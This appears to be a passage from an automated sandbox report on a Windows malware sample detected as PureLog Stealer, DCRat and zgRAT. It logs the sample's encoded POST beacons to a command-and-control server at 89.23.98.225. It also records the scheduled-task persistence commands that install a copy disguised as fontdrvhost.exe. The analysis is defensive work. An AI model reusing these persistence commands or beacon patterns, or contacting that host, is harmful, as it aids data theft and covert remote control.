                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                  Mar 29, 2024 07:38:16.254513025 CET344OUTData Raw: 05 00 04 07 03 08 04 05 05 06 02 01 02 0d 01 02 00 06 05 09 02 07 03 0f 02 03 0c 01 04 0e 00 00 0f 01 06 5a 01 02 06 05 0e 01 07 06 00 07 06 03 04 07 0c 5d 0a 07 04 00 06 05 06 51 05 01 04 00 01 01 0e 59 07 51 01 01 0c 53 0b 0f 0c 00 0e 08 07 57
                                                                  Data Ascii: Z]QYQSW[\L}S|Ne]wnYaetA}`UoX|MRoBp[{ceX}m{S`I|Au~V@xmbN}LS


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  10192.168.2.44974789.23.98.22580
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:38:30.363462925 CET333OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:30.605541945 CET294INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:30 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                  Mar 29, 2024 07:38:30.607585907 CET344OUTData Raw: 00 06 04 01 03 0d 01 04 05 06 02 01 02 04 01 00 00 06 05 0f 02 03 03 0d 03 06 0d 03 05 02 00 06 0f 51 06 5a 07 05 06 0b 0c 07 05 57 06 03 06 01 03 02 0c 5b 0f 0f 05 07 06 0e 06 51 04 56 05 01 02 05 0c 0e 05 05 01 04 0b 03 0c 05 0c 54 0b 04 02 07
                                                                  Data Ascii: QZW[QVTZTPR\L~C`uZtaj^beRBklr^tRZh|oRRZo`bmpCwI{^}e~V@@xCb~Le


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  11192.168.2.44974889.23.98.22580
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:38:43.429280996 CET398OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:43.666553020 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:43 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:38:43.669164896 CET344OUTData Raw: 00 01 04 01 06 0c 04 00 05 06 02 01 02 0d 01 02 00 0b 05 0c 02 07 03 01 01 0e 0e 06 05 07 03 52 0e 04 04 0c 03 03 06 00 0e 51 02 01 05 00 04 56 07 03 0d 00 0e 04 06 02 04 55 07 0d 07 03 06 08 05 0b 0e 59 05 51 06 53 0b 0e 0f 07 0d 54 0d 01 04 0c
                                                                  Data Ascii: RQVUYQSTP\L~@k^e[vrbXb[^BjYt|c^`txdX{`yX|m|CwIU[e~V@xmP}L[


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  12192.168.2.44974989.23.98.22580
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:38:55.054544926 CET381OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:55.290139914 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:55 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:38:55.293150902 CET344OUTData Raw: 00 03 01 00 06 0f 01 0b 05 06 02 01 02 06 01 00 00 07 05 0a 02 02 03 0a 01 06 0d 0d 06 04 02 09 0e 02 06 5c 00 03 03 06 0c 06 02 02 07 05 07 56 04 50 0f 0a 0f 07 04 05 04 01 07 0c 07 00 05 5a 00 56 0d 5a 00 03 06 53 0d 03 0b 03 0e 0d 0e 53 05 0c
                                                                  Data Ascii: \VPZVZSSZQ\L}T~`zc[iulAk|etBth]holZ^{^b}sUcY^~e~V@BxCfO~\y


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:07:36:51
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\ZT3pxe2Tb4.exe"
                                                                  Imagebase:0x9e0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:07:36:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:07:36:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:07:36:56
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Imagebase:0x260000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 87%, ReversingLabs
                                                                  • Detection: 73%, Virustotal, Browse
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:07:36:56
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Imagebase:0x8f0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:07:37:00
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:07:37:00
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:07:37:01
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:07:37:01
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:07:37:04
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0xcc0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:07:37:12
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x910000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:07:37:19
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x370000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:07:37:22
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:07:37:22
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:07:37:23
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:07:37:23
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
